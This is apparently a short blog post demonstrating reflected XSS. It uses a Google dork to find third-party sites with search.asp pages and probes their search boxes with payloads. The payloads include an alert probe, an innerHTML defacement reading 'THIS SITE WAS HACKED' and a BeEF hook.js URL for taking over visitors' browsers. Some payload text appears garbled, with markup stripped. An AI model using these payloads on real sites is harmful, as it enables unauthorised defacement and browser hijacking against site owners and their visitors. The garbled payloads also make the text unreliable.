Beef XSS Exploitation Demonstration

[inurl:.com/search.asp]

1. Test other website and input the code 

TEST

or alert(‘x’); on search box.
2. The result was show a heading title, but I’m not sure, then
3. Check the selection source to make sure it’s not a bold
4. Check if the query was processed by server without filtering

Test:
a. alert(‘x’);​
b. document.body.innerHTML=”body{visibility:hidden;}

THIS SITE WAS HACKED

“;
c. 

TEST

Beef XSS Query: Vulnerable XSS
http://127.0.0.1:3000/hook.js

Picture

Picture


Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s